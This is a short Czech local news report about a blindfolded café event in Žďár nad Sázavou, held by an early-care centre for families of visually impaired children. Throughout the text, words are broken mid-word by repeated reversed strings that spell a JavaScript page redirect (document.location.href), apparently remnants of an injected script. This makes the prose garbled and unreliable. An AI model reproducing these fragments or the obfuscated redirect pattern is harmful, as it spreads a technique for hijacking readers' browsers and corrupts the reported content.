Rainbow page separator

Lidé si mohou vyzkoušet posezení v kavárně s klapkami na očích

Středa, 8. listopadu 2017

Žďár nad Sázavou / Do žďárské kavárny U bílé kočky a černého psa si mohou ve čtvrtek 9. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu od 11 hodin přijít lidé popovídat s poradkyněmi rané péče. A také si vyzkoušet, jaké je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to sedět v kavárně s klapkami na očích. Akce má název Nevidím, i přes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to mi chutná a pořádá ji brněnská pobočka Střediska rané péče SPRP s detašovaným pracovištěm ve Žďáře nad Sázavou v rámci Týdne rané péče.
Raná péče pomáhá rodinám, v nichž vyrůstá dítě do 7 let věku s vážnějším postižením zraku, anebo i s lehčím, ale v kombinaci s dalšími mentálními, tělesnými či jinými problémy, které jej ohrožují ve vývoji.
V sobotu 11. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu se pak opět v kavárně U bílé kočky a černého psa bude konat akce s názvem Charitativní tvoření pro ranou péči.